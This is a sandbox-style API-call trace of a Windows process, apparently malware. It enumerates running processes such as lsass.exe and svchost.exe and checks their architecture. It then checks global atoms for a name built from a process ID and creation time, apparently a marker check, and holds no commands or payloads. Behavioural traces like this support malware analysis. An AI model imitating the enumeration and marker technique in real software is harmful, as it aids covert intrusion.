	[0133.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.385] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.385] CloseHandle (hObject=0x2dc) returned 1
	[0133.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0133.385] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.385] CloseHandle (hObject=0x2dc) returned 1
	[0133.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d128, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0133.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.386] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.386] CloseHandle (hObject=0x2dc) returned 1
	[0133.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.386] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.386] CloseHandle (hObject=0x2dc) returned 1
	[0133.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.387] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.387] CloseHandle (hObject=0x2dc) returned 1
	[0133.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5c10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.387] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.387] CloseHandle (hObject=0x2dc) returned 1
	[0133.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0133.388] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.388] CloseHandle (hObject=0x2dc) returned 1
	[0133.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.388] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.388] CloseHandle (hObject=0x2dc) returned 1
	[0133.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5b38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.389] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.389] CloseHandle (hObject=0x2dc) returned 1
	[0133.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.389] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.389] CloseHandle (hObject=0x2dc) returned 1
	[0133.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.390] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.390] CloseHandle (hObject=0x2dc) returned 1
	[0133.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.390] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.390] CloseHandle (hObject=0x2dc) returned 1
	[0133.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d5f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.390] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.390] CloseHandle (hObject=0x2dc) returned 1
	[0133.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0133.391] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.391] CloseHandle (hObject=0x2dc) returned 1
	[0133.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b98c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0133.392] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.392] CloseHandle (hObject=0x2dc) returned 1
	[0133.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.392] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.392] CloseHandle (hObject=0x2dc) returned 1
	[0133.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.392] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.392] CloseHandle (hObject=0x2dc) returned 1
	[0133.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.393] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.393] CloseHandle (hObject=0x2dc) returned 1
	[0133.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0133.393] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.393] CloseHandle (hObject=0x2dc) returned 1
	[0133.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d1a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.394] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.394] CloseHandle (hObject=0x2dc) returned 1
	[0133.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5a48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.394] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.394] CloseHandle (hObject=0x2dc) returned 1
	[0133.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.395] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.395] CloseHandle (hObject=0x2dc) returned 1
	[0133.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9af0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0133.395] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.395] CloseHandle (hObject=0x2dc) returned 1
	[0133.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.395] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.395] CloseHandle (hObject=0x2dc) returned 1
	[0133.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0133.396] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.396] CloseHandle (hObject=0x2dc) returned 1
	[0133.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0133.396] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.396] CloseHandle (hObject=0x2dc) returned 1
	[0133.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b59e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.397] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.397] CloseHandle (hObject=0x2dc) returned 1
	[0133.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d1a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0133.397] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.397] CloseHandle (hObject=0x2dc) returned 1
	[0133.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0133.398] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.398] CloseHandle (hObject=0x2dc) returned 1
	[0133.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0133.398] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.398] CloseHandle (hObject=0x2dc) returned 1
	[0133.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.398] GetLastError () returned 0x5
	[0133.398] GetLastError () returned 0x5
	[0133.398] GetLastError () returned 0x5
	[0133.398] GetLastError () returned 0x5
	[0133.398] GetLastError () returned 0x5
	[0133.398] GetLastError () returned 0x5
	[0133.398] GetLastError () returned 0x5
	[0133.398] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.399] GetLastError () returned 0x5
	[0133.400] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.400] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0133.400] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0133.400] GetLastError () returned 0x5
	[0133.400] GetLastError () returned 0x5
	[0133.400] GetLastError () returned 0x5
	[0133.400] GetLastError () returned 0x5
	[0133.400] GetLastError () returned 0x5
	[0133.400] GetLastError () returned 0x5
	[0133.400] GetLastError () returned 0x5
	[0133.400] GetLastError () returned 0x5
	[0133.400] GetLastError () returned 0x5
	[0133.400] GetLastError () returned 0x5
	[0133.400] GetLastError () returned 0x5
	[0133.400] GetLastError () returned 0x5
	[0133.400] GetLastError () returned 0x5
	[0133.400] GetLastError () returned 0x5
	[0133.400] GetLastError () returned 0x5
	[0133.400] GetLastError () returned 0x5
	[0133.400] GetLastError () returned 0x5
	[0133.400] GetLastError () returned 0x5
	[0133.400] GetLastError () returned 0x5
	[0133.400] GetLastError () returned 0x5
	[0133.400] GetLastError () returned 0x5
	[0133.400] GetLastError () returned 0x5
	[0133.400] GetLastError () returned 0x5
	[0133.400] GetLastError () returned 0x5
	[0133.400] GetLastError () returned 0x5
	[0133.400] GetLastError () returned 0x5
	[0133.401] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.401] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetLastError () returned 0x5
	[0133.402] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.403] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0133.403] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.403] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0133.403] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0133.403] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0133.403] CloseHandle (hObject=0x2dc) returned 1
	[0133.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0133.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.404] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.404] CloseHandle (hObject=0x2dc) returned 1
